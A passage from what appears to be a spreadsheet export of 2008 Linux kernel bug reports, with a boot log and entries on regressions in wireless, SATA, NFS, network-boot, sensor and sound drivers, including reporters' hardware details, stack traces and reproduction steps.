port 0xc0004280 irq 22 [ 3.637902] ata1: softreset failed (device not ready) [ 3.648575] ata1: failed due to HW bug, retry pmp=0 [ 3.817921] ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 4.252015] ata1.00: ATA-7: TOSHIBA MK1234GSX, AH001D, max UDMA/100 [ 4.262612] ata1.00: 234441648 sectors, multi 16: LBA48 NCQ (depth 31/32) [ 4.273227] ata1.00: SB600 AHCI: limiting to 255 sectors per cmd [ 4.285080] ata1.00: SB600 AHCI: limiting to 255 sectors per cmd [ 4.294756] ata1.00: configured for UDMA/100 [ 4.625004] ata2: SATA link down (SStatus 0 SControl 300) [ 4.955247] ata3: SATA link down (SStatus 0 SControl 300) [ 5.285241] ata4: SATA link down (SStatus 0 SControl 300) [ 5.295585] scsi 0:0:0:0: Direct-Access ATA TOSHIBA MK1234GS AH00 PQ: 0 ANSI: 5 [ 5.306328] sd 0:0:0:0: [sda] 234441648 512-byte hardware sectors (120034 MB) [ 5.320419] sd 0:0:0:0: [sda] Write Protect is off [ 5.328750] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [ 5.330925] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 5.341567] sd 0:0:0:0: [sda] 234441648 512-byte hardware sectors (120034 MB) [ 5.355508] sd 0:0:0:0: [sda] Write Protect is off [ 5.366136] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [ 5.366136] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 5.371172] sda: sda1 sda2 sda3 &lt; sda5 sda6 sda7 sda8 &gt; [ 5.490166] sd 0:0:0:0: [sda] Attached SCSI disk [ 5.500667] sd 0:0:0:0: Attached scsi generic sg0 type 0 [ 5.511069] usbmon: debugfs is not available [ 5.521351] ehci_hcd 0000:00:13.5: PCI INT D -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 5.531699] ehci_hcd 0000:00:13.5: EHCI Host Controller [ 5.541866] ehci_hcd 0000:00:13.5: new USB bus registered, assigned bus number 1 [ 5.552039] ehci_hcd 0000:00:13.5: debug port 1 [ 5.562005] ehci_hcd 0000:00:13.5: irq 19, io mem 0xc0004400 [ 5.580772] ehci_hcd 0000:00:13.5: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 [ 5.590097] usb usb1: configuration #1 chosen from 1 choice [ 5.599993] hub 1-0:1.0: USB hub found [ 5.609613] hub 1-0:1.0: 10 ports detected [ 5.720208] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002 [ 5.729817] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 5.739389] usb usb1: Product: EHCI Host Controller [ 5.748879] usb usb1: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ehci_hcd [ 5.758493] usb usb1: SerialNumber: 0000:00:13.5 [ 5.767993] ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver [ 5.768006] ohci_hcd 0000:00:13.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 5.777691] ohci_hcd 0000:00:13.0: OHCI Host Controller [ 5.787240] ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 2 [ 5.796782] ohci_hcd 0000:00:13.0: irq 16, io mem 0xc0005000 [ 5.860879] usb usb2: configuration #1 chosen from 1 choice [ 5.870511] hub 2-0:1.0: USB hub found [ 5.880256] hub 2-0:1.0: 2 ports detected [ 5.990194] usb usb2: New USB device found, idVendor=1d6b, idProduct=0001 [ 6.000018] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 6.009824] usb usb2: Product: OHCI Host Controller [ 6.019733] usb usb2: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ohci_hcd [ 6.029962] usb usb2: SerialNumber: 0000:00:13.0 [ 6.040099] ohci_hcd 0000:00:13.1: PCI INT B -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 6.050443] ohci_hcd 0000:00:13.1: OHCI Host Controller [ 6.060669] ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 3 [ 6.070945] ohci_hcd 0000:00:13.1: irq 17, io mem 0xc0006000 [ 6.138337] usb usb3: configuration #1 chosen from 1 choice [ 6.148472] hub 3-0:1.0: USB hub found [ 6.158659] hub 3-0:1.0: 2 ports detected [ 6.270139] usb usb3: New USB device found, idVendor=1d6b, idProduct=0001 [ 6.280398] usb usb3: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 6.290873] usb usb3: Product: OHCI Host Controller [ 6.301429] usb usb3: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ohci_hcd [ 6.312072] usb usb3: SerialNumber: 0000:00:13.1 [ 6.322548] ohci_hcd 0000:00:13.2: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 6.333154] ohci_hcd 0000:00:13.2: OHCI Host Controller [ 6.343594] ohci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 4 [ 6.354082] ohci_hcd 0000:00:13.2: irq 18, io mem 0xc0007000 [ 6.420804] usb usb4: configuration #1 chosen from 1 choice [ 6.431148] hub 4-0:1.0: USB hub found [ 6.441274] hub 4-0:1.0: 2 ports detected [ 6.553451] usb usb4: New USB device found, idVendor=1d6b, idProduct=0001 [ 6.563318] usb 3-1: new low speed USB device using ohci_hcd and address 2 [ 6.574041] usb usb4: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 6.584389] usb usb4: Product: OHCI Host Controller [ 6.594740] usb usb4: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ohci_hcd [ 6.605263] usb usb4: SerialNumber: 0000:00:13.2 [ 6.615681] ohci_hcd 0000:00:13.3: PCI INT B -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 6.626349] ohci_hcd 0000:00:13.3: OHCI Host Controller [ 6.636901] ohci_hcd 0000:00:13.3: new USB bus registered, assigned bus number 5 [ 6.647500] ohci_hcd 0000:00:13.3: irq 17, io mem 0xc0008000 [ 6.714960] usb usb5: configuration #1 chosen from 1 choice [ 6.725603] hub 5-0:1.0: USB hub found [ 6.736067] hub 5-0:1.0: 2 ports detected [ 6.752307] usb 3-1: configuration #1 chosen from 1 choice [ 6.766339] usb 3-1: New USB device found, idVendor=093a, idProduct=2500 [ 6.776773] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 6.787199] usb 3-1: Product: USB OPTICAL MOUSE [ 6.797473] usb 3-1: Manufacturer: PIXART [ 6.846785] usb usb5: New USB device found, idVendor=1d6b, idProduct=0001 [ 6.857167] usb usb5: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 6.867577] usb usb5: Product: OHCI Host Controller [ 6.877942] usb usb5: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ohci_hcd [ 6.888448] usb usb5: SerialNumber: 0000:00:13.3 [ 6.898982] ohci_hcd 0000:00:13.4: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 6.909603] ohci_hcd 0000:00:13.4: OHCI Host Controller [ 6.920108] ohci_hcd 0000:00:13.4: new USB bus registered, assigned bus number 6 [ 6.930704] ohci_hcd 0000:00:13.4: irq 18, io mem 0xc0009000 [ 6.997461] usb usb6: configuration #1 chosen from 1 choice [ 7.007882] hub 6-0:1.0: USB hub found [ 7.018164] hub 6-0:1.0: 2 ports detected [ 7.130113] usb usb6: New USB device found, idVendor=1d6b, idProduct=0001 [ 7.140512] usb usb6: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 7.150921] usb usb6: Product: OHCI Host Controller [ 7.161275] usb usb6: Manufacturer: Linux 2.6.26-g6-+-05253-g14b395e ohci_hcd [ 7.171787] usb usb6: SerialNumber: 0000:00:13.4 [ 7.182338] Initializing USB Mass Storage driver... [ 7.192782] usbcore: registered new interface driver usb-storage [ 7.203276] USB Mass Storage support registered. [ 7.213717] PNP: PS/2 Controller [PNP0303:KBC0,PNP0f13:MSE0] at 0x60,0x64 irq 1,12 [ 7.226442] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 7.236963] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 7.247334] mice: PS/2 mouse device common for all mice [ 7.306112] input: AT Translated Set 2 keyboard as /class/input/input5 [ 7.324682] rtc_cmos 00:04: rtc core: registered rtc_cmos as rtc0 [ 7.335278] rtc0: alarms up to one month [ 7.345696] i2c /dev entries driver [ 7.356087] piix4_smbus 0000:00:14.0: SMBus Host Controller at 0x8410, revision 0 [ 7.366830] Driver for 1-wire Dallas network protocol. [ 7.377606] 1-Wire driver for the DS2760 battery monitor chip - (c) 2004-2005, Szabolcs Gyurko [ 7.968734] Synaptics Touchpad, model: 1, fw: 6.3, id: 0x180b1, caps: 0xa04713/0x200000 [ 8.015704] input: SynPS/2 Synaptics TouchPad as /class/input/input6 [ 8.033986] device-mapper: uevent: version 1.0.3 [ 8.044879] device-mapper: ioctl: 4.13.0-ioctl (2007-10-18) initialised: dm-devel@redhat.com [ 8.056016] EDAC MC: Ver: 2.1.0 Jul 21 2008 [ 8.067190] cpuidle: using governor ladder [ 8.078080] cpuidle: using governor menu [ 8.088882] sdhci: Secure Digital Host Controller Interface driver [ 8.099805] sdhci: Copyright(c) Pierre Ossman [ 8.110643] usbcore: registered new interface driver hiddev [ 8.127600] input: PIXART USB OPTICAL MOUSE as /class/input/input7 [ 8.144239] input,hidraw0: USB HID v1.10 Mouse [PIXART USB OPTICAL MOUSE] on usb-0000:00:13.1-1 [ 8.155663] usbcore: registered new interface driver usbhid [ 8.166952] usbhid: v2.6:USB HID core driver [ 8.178241] Advanced Linux Sound Architecture Driver Version 1.0.17. [ 8.189795] HDA Intel 0000:00:14.2: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 8.281318] ALSA device list: [ 8.292709] #0: HDA ATI SB at 0xc0000000 irq 16 [ 8.304081] oprofile: using NMI interrupt. [ 8.315861] TCP cubic registered [ 8.327053] NET: Registered protocol family 10 [ 8.339231] IPv6 over IPv4 tunneling driver [ 8.350797] NET: Registered protocol family 17 [ 8.361978] RPC: Registered udp transport module. [ 8.372925] RPC: Registered tcp transport module. [ 8.384413] SCTP: Hash tables configured (established 65536 bind 65536) [ 8.400988] powernow-k8: Found 1 AMD Turion(tm) 64 X2 Mobile Technology TL-56 processors (2 cpu cores) (version 2.20.00) [ 8.414045] powernow-k8: 0 : fid 0xa (1800 MHz), vid 0x13 [ 8.425471] powernow-k8: 1 : fid 0x8 (1600 MHz), vid 0x15 [ 8.436777] powernow-k8: 2 : fid 0x0 (800 MHz), vid 0x1e [ 8.447971] Starting balanced_irq [ 8.458958] Using IPI No-Shortcut mode [ 8.473226] rtc_cmos 00:04: setting system clock to 2008-07-22 09:55:49 UTC (1216720549) [ 8.526685] kjournald starting. Commit interval 5 seconds [ 8.528410] EXT3-fs: mounted filesystem with ordered data mode. [ 8.528410] VFS: Mounted root (ext3 filesystem) readonly. [ 8.528410] Freeing unused kernel memory: 308k freed [ 10.872501] shpchp: Standard Hot Plug PCI Controller Driver version: 0.4 [ 11.019464] Adding 1574328k swap on /dev/sda5. Priority:-1 extents:1 across:1574328k [ 11.104435] fuse init (API version 7.9) [ 12.241082] EXT3 FS on sda7, internal journal [ 12.230801] kjournald starting. Commit interval 5 seconds [ 12.598430] EXT3 FS on sda8, internal journal [ 12.598430] EXT3-fs: mounted filesystem with ordered data mode. [ 14.043340] ADDRCONF(NETDEV_UP): eth0: link is not ready [ 17.350183] b44: eth0: Link is up at 100 Mbps, full duplex. [ 17.350190] b44: eth0: Flow control is off for TX and off for RX. [ 17.350851] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready [ 25.725442] pci 0000:01:05.0: power state changed by ACPI to D0 [ 25.726157] pci 0000:01:05.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 25.726410] [drm] Initialized radeon 1.29.0 20080528 on minor 0 [ 26.498359] Clocksource tsc unstable (delta = -164423884 ns) [ 27.595910] [drm] Setting GART location based on new memory map [ 27.596278] [drm] Loading R300 Microcode [ 27.596305] [drm] Num pipes: 3 [ 27.596316] [drm] writeback test succeeded in 1 usecs [ 27.968364] eth0: no IPv6 routers present [ 52.858521] hda-intel: Invalid position buffer, using LPIB read method instead. [ 1028.112952] ACPI: EC: missing confirmations, switch off interrupt mode. [ 1031.163449] ACPI: EC: acpi_ec_wait timeout, status = 0x09, event = "b0=1" [ 1031.163619] ACPI: EC: read timeout, command = 130 [ 1042.063581] ACPI: EC: acpi_ec_wait timeout, status </t>
  </si>
  <si>
    <t>dhcp doesn't work with iwl4965</t>
  </si>
  <si>
    <t>2.6.26-git7</t>
  </si>
  <si>
    <t>2008-07-22 03:21 UTC</t>
  </si>
  <si>
    <t>2008-08-14 08:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-git6 Earliest failing kernel version: 2.6.26-git7 Distribution: Gentoo Hardware Environment: Packard Bell MB86, iwl4965 Software Environment: dhcpcd Problem Description: I can't get an IP address via DHCP with my wireless connection. I have an Intel Wireless 4965 card and I use WPA personal with AES encryption. After a git-bisect run, it seems the first bad commit is the following: commit 175f9c1bba9b825d22b142d183c9e175488b260c Author: Jussi Kivilinna &lt;jussi.kivilinna@mbnet.fi&gt; Date: Sun Jul 20 00:08:47 2008 -0700 net_sched: Add size table for qdiscs Add size table functions for qdiscs and calculate packet size in qdisc_enqueue(). Based on patch by Patrick McHardy http://marc.info/?l=linux-netdev&amp;m=115201979221729&amp;w=2 Steps to reproduce:</t>
  </si>
  <si>
    <t>AHCI driver work incorrectly, HDD hang when  heavy load.</t>
  </si>
  <si>
    <t>2008-07-22 15:07 UTC</t>
  </si>
  <si>
    <t>Yuriy Dmitriev</t>
  </si>
  <si>
    <t>2010-01-19 20:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.11 Earliest failing kernel version: 2.6. (forgot) 15 or later. Distribution: gentoo vanilla kernel. Hardware Environment: MB asus p955x CPU 920D 2G ram lspci 00:00.0 Host bridge: Intel Corporation 82955X Memory Controller Hub (rev 81) 00:01.0 PCI bridge: Intel Corporation 82955X PCI Express Root Port (rev 81) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 01) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev e1) 00:1f.0 ISA bridge: Intel Corporation 82801GB/GR (ICH7 Family) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 01) 00:1f.2 SATA controller: Intel Corporation 82801GR/GH (ICH7 Family) SATA AHCI Controller (rev 01) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 01) 01:05.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) 03:00.0 VGA compatible controller: nVidia Corporation NV43 [GeForce 6600 GT] (rev a2) Software Environment: minimal console work, no one running services. all hand maded minimal. Problem Description: I write this from 2.6.25.11 but can`t from 2.6.26 This message from /var/log/messages. When disk in state havy load aprox 20-30 min, for example compile gcc $ gcc -v Using built-in specs. Target: x86_64-pc-linux-gnu Configured with: /var/tmp/portage/sys-devel/gcc-4.1.2/work/gcc-4.1.2/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.1.2 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.1.2/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.2 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.2/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.2/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.1.2/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --disable-libgcj --enable-languages=c,c++,treelang --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu Thread model: posix gcc version 4.1.2 (Gentoo 4.1.2 p1.1) or, 3 simulateonly command $ rsync -r /usr/portage /tmp/{1,2,3,4} or, simple #emerge gcc I see this message. Jul 22 22:56:23 triod ata1.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen Jul 22 22:56:23 triod ata1.00: cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 Jul 22 22:56:23 triod res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) Jul 22 22:56:23 triod ata1.00: status: { DRDY } Jul 22 22:56:24 triod ata1: soft resetting link Jul 22 22:56:24 triod ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) Jul 22 22:56:24 triod ata1.00: configured for UDMA/133 Jul 22 22:56:24 triod ata1: EH complete Jul 22 22:56:24 triod sd 0:0:0:0: [sda] 156301488 512-byte hardware sectors (80026 MB) Jul 22 22:56:24 triod sd 0:0:0:0: [sda] Write Protect is off Jul 22 22:56:24 triod sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Jul 22 22:56:24 triod sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA and, comuter stil WORKING. BUT, on 2.6.26 computer HUNG BEFORE disk reinitialization. I see only like Jul 22 22:56:23 triod ata1.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen Jul 22 22:56:23 triod ata1.00: cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 Jul 22 22:56:23 triod res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) Jul 22 22:56:23 triod ata1.00: status: { DRDY } Jul 22 22:56:24 triod ata1: soft resetting link and disk is unacceptable. kernel not hang, work only software, which now in memory. I try replace HDD, some play with kernels config - result = 0. FS=XFS. Afrer reset, xfs_check, and 20-30 min kernel work, and HUNG on first HDD havy load, like copy large count of files. Steps to reproduce: install gentoo and try #emerge gcc or some IO load. HDD- samsung 80 Gb 100% working. I try change - same result. Help only downgrade from 2.6.26 to 2.6.25.11 If need some add info - question is welcome )))))</t>
  </si>
  <si>
    <t>NFS hangs with 2.6.25/2.6.26 despite server being reachable</t>
  </si>
  <si>
    <t>2.6.25, 2.6.26, 2.6.27</t>
  </si>
  <si>
    <t>2008-07-24 02:57 UTC</t>
  </si>
  <si>
    <t>2010-02-03 21:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25 Distribution: debian etch Problem Description: I'm getting frequent NFS hangs when running 2.6.25 or 2.6.26 on my NFS clients, while 2.6.24 seems to work fine. The hangs most commonly (but not always) happen after a suspend/resume cycle on the client. The client is pingable from the server during the hangs, but the clients can't access their NFS mounted rootfs. 2.6.25 based clients always recover after some time (varies from just seconds to 5 or 10 minutes). 2.6.26 based clients apparently never recover. Here are a few more details about my setup: * The NFS server is a linux host (x86-64) running 2.6.22.19; * I have two diskless clients using different hardware, one is an old AMD K7 with intel pro/100 adapter, the other is x86-64 with on-board intel e1000e networking. * The clients boot from a small initrd and mount their rootfs using NFS3 over TCP. The initial mounting is done with "nfsmount -o ro,nolock" from the klibc-utils package. * /etc/fstab in the clients describe the nfs root as having the nolock,noatime options. The boot scripts (unmodified from my debian etch distro) remount the root using these. In the end, /proc/mounts shows the rootfs as using the following options: When running 2.6.24 on the client: rw,noatime,vers=3,rsize=131072,wsize=131072,hard,nointr, nolock,proto=tcp,timeo=7,retrans=3,sec=sys When running 2.6.26 on the client: rw,noatime,vers=3,rsize=131072,wsize=131072,namlen=255,hard,nointr, nolock,proto=tcp,timeo=7,retrans=3,sec=sys,mountproto=udp * I often run suspend-to-ram on the clients, if I think they'll be unused for a few hours. * The issue most often happens after a resume. The clients hang showing the classic symptoms of what would happen if they can not reach their NFS server: load goes to high values, processes can't access the filesystem and get 'stuck' when they try to do so. Some processes which don't access the filesystem, like xload for example, keep going and display high load values. Shell sessions usualy get stuck before I can do anything useful with them. * I can log on the server and confirm that the clients are pingable from there during the times where they seem stuck on their NFS accesses. * 2.6.24 based clients do not exhibit this failure. 2.6.25 based clients always recover after a while (can vary from few seconds to 10 minutes or so). 2.6.26 based clients don't seem to recover, as far as I could see (I only let this happen once on each of my clients, so far, and have gone back to 2.6.25 for further experiments). * I don't suppose the failure to be related to ACPI suspend issues, given that I've observed it on both of my NFS clients with very different hardware. * I do not fully understand which parameters trigger this failure. I can sometimes run 2.6.25 for a week without hitting it, and then hit it twice in a row the next day... Not a good candidate for a binary search, I think :/ On a suggestion from J. Bruce Fields, I obtained a couple sysrq-T traces of a client during the NFS freeze, attached below. I'm also open to other suggestions about information to collect - I am, however, not sure if I'll be able to try anything in a root shell session during the NFS hangs, given the very limited functionality of the clients during these... :/</t>
  </si>
  <si>
    <t>Old kernels copy memory faster than new</t>
  </si>
  <si>
    <t>2.6.24, 2.6.25</t>
  </si>
  <si>
    <t>2008-07-24 10:57 UTC</t>
  </si>
  <si>
    <t>smalcom</t>
  </si>
  <si>
    <t>2008-07-28 00:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.24 Distribution: Slackware 10-12 First machine: CPU - AMD Athlon3600+(2ГГц) Chipset - nForce 6150(MCP51) RAM - 3G DDR2 Video - internal GeForce6150 Kernel - 2.6.25.4(own built) Copy speed - 1.7GByte/s on another kernel: Kernel - 2.6.23.5(own built) Copy speed - 43.5GByte/s -------------------------------------------- Second machine: CPU - PII-350 MB i440BX RAM - 128M SDRAM Video - 3DFX Voodoo3 Kernel - 2.6.21.5(Vanila from slackware distribution) Copy speed - 11.3GByte/s Steps to reproduce: dd if=/dev/zero of=/dev/null bs=16M count=10000</t>
  </si>
  <si>
    <t>R8102-E (Intel Atom, D945GCLF) and r8169 fails network boot - cannot get DHCP lease</t>
  </si>
  <si>
    <t>2008-07-24 14:15 UTC</t>
  </si>
  <si>
    <t>Alex Howells</t>
  </si>
  <si>
    <t>2008-10-11 10:12 UTC</t>
  </si>
  <si>
    <t>Operating System: Both Debian GNU/Linux and Gentoo Linux Latest working: Any kernel compiled for i386 (x86) works fine yet 2.6.25/2.6.26 fail miserably when x86_64 More information over at -- http://bugs.gentoo.org/show_bug.cgi?id=232857 Board is an Intel D945GCLF with Atom 230, 1 x 2GB DIMM of DDR2, 2 x 100GB SATA. Will attach kernel configurations for working 2.6.26 kernel (x86) and the configuration for our amd64 kernel which fails to acquire DHCP lease, plus output from the boot sequence of the box on both kernels. Our environment is pretty simple. Network boot a box via PXE and send kernel via TFTP then mount "rescue environment" (simple nfsroot) as root filesystem. From there we do recovery stuff and operating system installations. Happy to take any suggestions or patches and test them out.</t>
  </si>
  <si>
    <t>sky2 Oops on ifconfig eth0 down on linux-2.6.26-git11</t>
  </si>
  <si>
    <t>2.6.26-git11</t>
  </si>
  <si>
    <t>2008-07-25 01:19 UTC</t>
  </si>
  <si>
    <t>2009-06-01 17:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: linux-2.6.26-git9 Earliest failing kernel version: linux-2.6.26-git11 Distribution: gentoo Hardware Environment: macbook revision 2 Problem Description: ------------[ cut here ]------------ WARNING: at net/core/dev.c:1344 __netif_schedule+0x24/0x6d() Modules linked in: coretemp hwmon i2c_i801 sky2 Pid: 3198, comm: ifconfig Not tainted 2.6.26-git11 #1 Call Trace: [&lt;ffffffff8022eb69&gt;] warn_on_slowpath+0x51/0x8c [&lt;ffffffff80240459&gt;] autoremove_wake_function+0x9/0x2e [&lt;ffffffff80226550&gt;] __wake_up_common+0x46/0x76 [&lt;ffffffff802273b3&gt;] __wake_up+0x38/0x4e [&lt;ffffffff804d163e&gt;] __netif_schedule+0x24/0x6d [&lt;ffffffffa0003a40&gt;] sky2_down+0x367/0x433 [sky2] [&lt;ffffffff804df797&gt;] some_qdisc_is_running+0x4e/0x6e [&lt;ffffffff804d3a62&gt;] dev_close+0x69/0x88 [&lt;ffffffff804d374a&gt;] dev_change_flags+0xa6/0x163 [&lt;ffffffff80509fe4&gt;] devinet_ioctl+0x268/0x5c4 [&lt;ffffffff80285799&gt;] __user_walk_fd+0x48/0x53 [&lt;ffffffff804c791a&gt;] sock_ioctl+0x1eb/0x20f [&lt;ffffffff80286d99&gt;] vfs_ioctl+0x21/0x6c [&lt;ffffffff8028700b&gt;] do_vfs_ioctl+0x227/0x23d [&lt;ffffffff8028705e&gt;] sys_ioctl+0x3d/0x5f [&lt;ffffffff8020b20b&gt;] system_call_fastpath+0x16/0x1b ---[ end trace a64966769ce52dec ]--- Steps to reproduce: ifconfig eth0 down This is also the first kernel version I tried with ath9k (which btw works), it may or may not have some influence on this, will try later.</t>
  </si>
  <si>
    <t>modprobe coretemp fails with Intel Atom (model 1c)</t>
  </si>
  <si>
    <t>2.6.24 - 2.6.26</t>
  </si>
  <si>
    <t>2008-07-25 05:56 UTC</t>
  </si>
  <si>
    <t>Simon Depiets</t>
  </si>
  <si>
    <t>2011-02-09 10:04 UTC</t>
  </si>
  <si>
    <t>Rudolf Marek</t>
  </si>
  <si>
    <t>Hi, Latest working kernel version: None Earliest failing kernel version: All Distribution: Ubuntu Hardware Environment: Acer Aspire One, http://www.mmo-tools.com/acpi/lspci.txt Problem Description: it seems that drivers/hwmon/coretemp.c doesn't support new Intel's Atom CPU the error message is coretemp: Unknown CPU model 1c You can find more about this here on linux-acpi mailing list where the discussion started about fan speed control/cpu temperature http://marc.info/?l=linux-acpi&amp;m=121698923928851&amp;w=2 I'll try do my best to help you, but i'm not a kernel hacker (yet?), I can answer you in french too if i'm not clear enough Steps to reproduce: $sudo modprobe coretemp FATAL: Error inserting coretemp (/lib/modules/2.6.24-19-generic/kernel/drivers/hwmon/coretemp.ko): No such device $dmesg -c coretemp: Unknown CPU model 1c Extra info : ACPI Dump : http://www.mmo-tools.com/acpi/acpidump.txt Sensors Detect : http://www.mmo-tools.com/acpi/sensors-detect-stat.txt Thanks a lot</t>
  </si>
  <si>
    <t>sound in saa7130 doesn't work in kernel 2.6.26</t>
  </si>
  <si>
    <t>2008-07-25 10:45 UTC</t>
  </si>
  <si>
    <t>Hussam Al-Tayeb</t>
  </si>
  <si>
    <t>2008-08-11 01:21 UTC</t>
  </si>
  <si>
    <t>sound ind saa7130 tv card using saa7134 kernel module stopped working after updated from kernel 2.6.25.11 to 2.6.26</t>
  </si>
  <si>
    <t>Compile error in iwlwifi/iwl-led.c in function iwl_led_brightness_set</t>
  </si>
  <si>
    <t>2.6.26-git14</t>
  </si>
  <si>
    <t>2008-07-26 11:53 UTC</t>
  </si>
  <si>
    <t>Kosta</t>
  </si>
  <si>
    <t>2008-07-30 14:10 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-git4 Earliest failing kernel version: 2.6.26-git14 Distribution: All Hardware Environment: Acer Aspire 5050-5430 AMD Athlon TK-53 64x Software Environment: All Problem Description: Compile error in iwlwifi/iwl-led.c in function iwl_led_brightness_set Steps to reproduce: Apply 2.6.26-git14 patch to main tree and run make. make[5]: *** [drivers/net/wireless/iwlwifi/iwl-led.o] Error 1 make[4]: *** [drivers/net/wireless/iwlwifi] Error 2 make[3]: *** [drivers/net/wireless] Error 2 make[2]: *** [drivers/net] Error 2 make[1]: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>powertop segfault because of kernel BUG</t>
  </si>
  <si>
    <t>2.6.27-rc1</t>
  </si>
  <si>
    <t>2008-07-29 16:34 UTC</t>
  </si>
  <si>
    <t>2008-11-13 07:09 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.11 Earliest failing kernel version: 2.6.27-rc1 Distribution: Debian Sid Hardware Environment: Fujitsu-Siemens E8110, Intel T2400, 1.5 GB Software Environment: Gnome 2.22 Problem Description: powertop segfauls after gathering initial stats Steps to reproduce: start powertop, wait until it crashes, check dmesg</t>
  </si>
  <si>
    <t>rtl8180: disconnects randomly after some minutes of use. (and other things)</t>
  </si>
  <si>
    <t>2008-07-30 02:14 UTC</t>
  </si>
  <si>
    <t>Diego Escalante Urrelo</t>
  </si>
  <si>
    <t>2010-07-19 20:54 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.25 (it was included since then) Distribution: Ubuntu Intrepid (but also fails in -say- Fedora that includes .25) Hardware Environment: IBM Thinkpad r50e laptop, card is pcmcia a cheap wifi card using the realtek chip. 02:00.0 CardBus bridge: Texas Instruments PCI1510 PC card Cardbus Controller 03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8180L 802.11b MAC (rev 20) Software Environment: Problem Description: When using the rtl8180 driver, the card drops the connection frequently by no reason, nothing is printed to dmesg. This is not a problem with the AP, the disconnections occur at the same exact place where it works with the alternative driver(see below) or ndiswrapper. If I recall correctly, this was present in an old version of the driver that ubuntu used to ship up to 2.6.16~18. Basically, when NetworkManager pinged the card for its status, it disconnected sometimes. Of course, we can't say it's a NM bug, given that so many other cards out there don't drop connections :). Alternative driver Thanks to the interwebs, I 